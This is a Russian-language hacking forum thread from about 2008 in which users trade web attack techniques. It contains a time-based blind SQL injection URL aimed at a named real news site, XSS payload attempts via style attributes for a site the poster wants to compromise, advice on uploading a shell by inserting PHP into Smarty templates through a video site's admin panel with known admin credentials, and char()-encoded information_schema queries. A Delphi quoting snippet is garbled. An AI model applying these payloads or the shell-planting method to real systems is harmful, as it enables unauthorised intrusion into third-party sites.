Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    С помощью BENCHMARK-ка только получилось
    http://www.yerevan.ru/news/print.php?id=128%20and%20id=IF(SUBSTRING(version(),1,1)=4,1,BENCHMARK(299971,MD5(NOW())))
     
    1 person likes this.
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Можно ли в теге
    <a href="123" <здесь> " target="_blank" class="bb-url"> 234 </a>
    вставить javascript, который будет исполняться сразу при заходе на страницу(не выпонляя никаких действий)? Пробовал следующие варианты, но безрезультатно...
    Code:
    style=background-image:url(javascript:alert(1);)
    sss='alert(1);this.sss=null' style='top:expression(eval(this.sss);)'
    style=url(javascript:alert(1);)
    
     
    #842 AFoST, 31 Jan 2008
    Last edited: 31 Jan 2008
    1 person likes this.
  3. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    а подробней можно,что это дает?
     
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    fobofob, вот здесь подробней http://forum.antichat.ru/thread35207.html

    смысл в использовании подзапросов, т.е. если логическое выражение SUBSTRING(version(),1,1)=4 правильное, то просто id сравнивается с 1, а если неправильное, то выполняется BENCHMARK(299971,MD5(NOW())), а это достаточно долго, т.е если логическое выражение правильное, то запрос выполнится сразу, а если неправильное, то "загрузка" страницы ненадолго "зависнет"
     
    1 person likes this.
  5. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    AFoST, JavaScript внутри style работает только в ИЕ. В других браузерах не получится
     
    2 people like this.
  6. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Хреново :-( Другие варианты вобще есть для ФФ и оперы? А то жалко терять xss на таком ресурсе :)
     
    1 person likes this.
  7. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Видимо, нет. Рад был бы ошибиться. Для тэга A разве что прописать события onclick, onmouseover и т.д., но минусы тут очевидны - потребуется какое-то действие от пользователя
     
    1 person likes this.
  8. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    onmouseover, onclick это само собой..ладно, спасибо за помощь!
     
  9. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Привет! Если я знаю логин и пасс админа в ютуб, как можно залить шелл?
     
  10. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    А если я знаю логин и пасс от админки google, как мне туда шелл залить??

    PS ближе к телу, какой движок. Попробуй залить вместо видео =/
     
  11. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Вместо видео некан.
    ЫЫ.. а как движок узнать?
     
  12. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Если подписано внизу страницы что-то типа Powered by ***

    Или надо искать по дорку такие же движки, где подписано...
     
  13. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    в том дело что нет поверед бай, и в админке нет. В админке могу редактировать наблоны *.tpl, знаю их полный адрес
     
  14. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    вот по дорку узнал
    Copyright © 2008 Powered By TeacherTube, LLC
     
  15. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Тогда это что-то типа clipshare или vshare youtube clone. Если редактирование получается, тогда вставляй между тегами {php}{/php} произвольный php код, это шаблоны smarty скорее всего. На странице, темплейт которой ты отредактируешь - код будет исполняться.
     
  16. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    xxx в Sql hex, без кавычек. Кодер здесь --> http://hack-shop.org.ru/tools-code-encode
     
    1 person likes this.
  17. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Ты немного не правильно понимаешь процедуру кодировки через char(). В скул-запросе чар используется следующим образом
    +from+information_schema.columns+where+table_name=char(ascii,ascii,...,)
    например
    +from+information_schema.columns+where+table_name=char(116,101,115,116)/*
    char(116,101,115,116)=test БЕЗ ковычек.
     
    1 person likes this.
  18. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    кто может выложить?
     
  19. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    SQL-инъекция
    Code:
    statement := 'SELECT * FROM users WHERE name = ' + QuoteParam(userName) + ';';
    function QuoteParam(s : string) : string;
    { на входе — строка; на выходе — строка в кавычках и с заменёнными спецсимволами }
    var
      i : integer;
      Dest : string;
    begin
      Dest := '"';
      for i:=1 to length(s) do 
        case si of
          ' : Dest := Dest + '\;
          '"' : Dest := Dest + '\"';
          '\' : Dest := Dest + '\\';
        else Dest := Dest + si;
        end; 
      QuoteParam := Dest + '"';
    end;
     
  20. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    компоненты для мамбы на делфи?... О_О
     
Thread Status:
Not open for further replies.